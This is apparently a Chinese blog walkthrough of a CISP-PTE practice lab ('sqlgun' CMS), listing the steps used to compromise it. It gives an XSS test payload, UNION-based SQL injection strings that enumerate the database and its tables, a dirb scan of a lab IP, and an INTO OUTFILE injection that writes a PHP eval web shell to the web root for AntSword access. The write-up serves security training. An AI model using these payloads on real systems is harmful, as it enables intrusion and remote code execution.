CISP-PTE CMS sqlgun靶场渗透测试

1.打开靶场

2.在搜索框尝试xss

<script>alert(1)</script>

发现此处存在xss漏洞

3.在搜索框尝试sql注入

-1' union select 1,2,3# 发现页面有回显

4.查询数据库名

-1' union select 1,database(),3#

5.查询数据库的所有表

-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='sqlgunnews'),3#

6.扫描敏感目录

dirb http://124.221.58.83:8081

7.访问phpinfo

可以看见网站的绝对路径

8.通过sql注入写入一句话木马

-1' union select 1,"<?php @eval($_POST[cmd]);?>",3 into outfile '/var/www/html/1.php' #

9.访问写入的php文件

10.使用蚁剑进行连接

相关推荐
硬汉嵌入式2 小时前
《安富莱嵌入式周报》第346期:开源2GHz带宽,12bit分辨率,3.2Gsps采样率示波,开源固件安全分析器, 开源口袋电源,开源健康测量,FreeCAD
安全·开源
锐成信息3 小时前
SSL证书助力企业保障数据安全,履行数据安全保护义务
安全·https
网安-轩逸4 小时前
网络安全:攻击和防御练习(全战课), DDos压力测试
web安全·okhttp·ddos
网络安全工程师老王4 小时前
flask请求头回显的学习和探究如何进行错误页面污染回显
web安全·网络安全·信息安全·flask
澜世5 小时前
2024小迪安全基础入门第七课
网络·笔记·安全·网络安全
妙哉7365 小时前
零基础学安全--云技术基础
安全
zl.rs5 小时前
对比C++,Rust在内存安全上做的努力
c++·安全·rust
网络研究院5 小时前
远程视频验证如何改变商业安全
安全·视频·远程·验证·商业
ZHOU西口6 小时前
MySQL系列之远程管理(安全)
数据库·mysql·安全·tls·加密连接·require_secure